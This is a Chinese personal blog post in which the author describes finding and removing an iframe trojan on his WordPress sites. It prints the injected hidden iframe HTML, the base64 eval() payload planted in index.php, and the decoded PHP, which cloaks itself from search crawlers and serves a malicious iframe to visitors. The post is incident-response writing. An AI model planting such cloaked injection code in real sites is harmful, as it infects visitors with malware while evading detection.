Forfly 翔!
Mr. Le's personal blog, life, love and others. 人生就像是旅行,不必在乎目的地,只在乎沿途的风景!
All Rights reserved by Mr. Le

wordpress网站被挂iframe木马

<div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”http://cucokakey111.vv.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==” width=”2″ height=”2″></iframe></div>, 很郁闷,所有的wordpress网站都被植入了这个链接。我一个朋友说访问了我的网站后,休了四个小时电脑。

这个是典型的IFRAME木马,我也感觉最近网站有些不对,因为以前的位置都是居中的,但是现在整个网站靠左边了。估计很久以前就被挂了这个木马了吧。

对于朋友们的受伤,我很是无奈和抱歉。这么多的黑客难道就没事做了么?干吗盯着我这个小小的网站啊。

首先说明一下,我所有的wordpress都用的ixwebhosting的空间,我已经联系了ixwebhosting,不知道他们又什么措施来修整。我另外一个网站用的DX的程序是个论坛,还没有出现问题。估计这个木马只是针对了WP吧。查看任何一个网站的源文件如下:

<div style=”position: absolute; left: -1999px; top: -2999px;”><iframe src=”http://cucokakey111.vv.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==” width=”2″ height=”2″></iframe></div><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml” dir=”ltr” lang=”en-US”>
<script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js”></script>
<head profile=”http://gmpg.org/xfn/11″>

罪魁祸首可见一般,把位置定在了靠左,然后连接到了一个该死的网站。

但是查看模板中的index.php和header.php都未发现异常。

这个时候我就很奇怪了,是什么原因呢?分析wordpress的调用顺序,我又查看了整个网站的INDEX.PHP,终于发现了异常。

<?php eval(base64_decode(ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZX
InLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ
3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnL
CdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRl
cm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9y
ZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90
ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KC
WFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiIC
ApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU
1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSI
pLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA
4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyM
TYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4L
jEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC4
2OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xO
TIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2
NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU
1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiK
Q0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICg
gJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX
2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA
8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2l
nbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IH
RydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk
5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL3lpZGV0ZWoxMTEuY3ouY2MvUVFrRkJ3UUdEUU1HQndZQUVrY
0pCUWNFQVFFQ0RRQUdBUT09IiB3aWR0aD0iMiIgaGVpZ2h0PSIyIj48L2lmcmFtZT48L2Rpdj4nOw0KfQ==
));
/**
 * Front to the WordPress application. This file doesn’t do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define(‘WP_USE_THEMES’, true);

/** Loads the WordPress Environment and Template */
require(‘./wp-blog-header.php’);
?>

正常的wordpress的index.php应该是没有红色这一部分的,我估计就是这一部分的加密代码搞怪,用了几个软件来解密没有成功,所以我就直接用好的index.php文件覆盖了源文件。

至此,网站一切正常了。

最后总结一下,wordpress架构的挂IFRAME 木马,一般情况下,首先打开网站看一下源文件,查看有无连到外网的隐藏链接,然后一次查看整个网站的INDEX.PHP, 如果不能发现问题,按照网站的调用顺序,查看WP-BLOG-HEADER.PHP,然后是wp-load.php, template-loader.php, 最后查看模板中的INDEX.PHP和head.PHP. 我估计修改模板中的可能性不大,因为黑客做起来非常麻烦,他不一定能够找到正在使用的模板。

做完之后,切记要修改一下FTP密码。我一直搞不明白,黑客是如何修改的文件。难道是我用了一些交互式的插件么?

网上有很多帖子,都是在讨论如何禁止IFRAME 结构的,勤快的同学可以试一下。

顺便说一下啊,IXWEBHOSTING还是不错的,好像一直在做实验,给我在后台做了备份。不过最终我还是自己搞定了啊。哈哈哈哈。

有点高兴的早了点,我以为覆盖之后就会没事了,但是几个小时之后发现,黑客程序又把index.php给修改了。无奈之下,只好先解密吧。

http://www.cnxct.com/cfc4n/eval-gzinflate-base64_decode.php

输入文本的时候注意,要以<? php 开头,以?>结尾,

上面的那些红色的解密之后如下:

01 error_reporting(0);
02 $bot = FALSE ;
03 $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
04 $stop_ips_masks = array(
05     array("216.239.32.0","216.239.63.255"),
06     array("64.68.80.0"  ,"64.68.87.255"  ),
07     array("66.102.0.0""66.102.15.255"),
08     array("64.233.160.0","64.233.191.255"),
09     array("66.249.64.0", "66.249.95.255"),
10     array("72.14.192.0", "72.14.255.255"),
11     array("209.85.128.0","209.85.255.255"),
12     array("198.108.100.192","198.108.100.207"),
13     array("173.194.0.0","173.194.255.255"),
14     array("216.33.229.144","216.33.229.151"),
15     array("216.33.229.160","216.33.229.167"),
16     array("209.185.108.128","209.185.108.255"),
17     array("216.109.75.80","216.109.75.95"),
18     array("64.68.88.0","64.68.95.255"),
19     array("64.68.64.64","64.68.64.127"),
20     array("64.41.221.192","64.41.221.207"),
21     array("74.125.0.0","74.125.255.255"),
22     array("65.52.0.0","65.55.255.255"),
23     array("74.6.0.0","74.6.255.255"),
24     array("67.195.0.0","67.195.255.255"),
25     array("72.30.0.0","72.30.255.255"),
26     array("38.0.0.0","38.255.255.255")
27     );
28 $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
29 foreach ( $stop_ips_masks as $IPs ) {
30     $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
31     if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
32 }
33 foreach ($user_agent_to_filter as $bot_sign){
34     if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
35 }
36 if (!$bot) {
37 echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://yidetej111.cz.cc/QQkFBwQGDQMGBwYAEkcJBQcEAQECDQAGAQ==" width="2" height="2"></iframe></div>';
38 }

 

但是,解密之后也没有办法解决。好消息从IXWEBHOSTING 传来,他们告诉我是FUCTION.PHP这个文件被感染了,已经帮我修改。

以后的几天我多次试验,网站确实好了,非常感谢IXWEBHOSTING的工作态度。

随手上网搜了几篇文章,稍后翻译一下给大家,请看相关文件吧。

2011-05-25

发表回复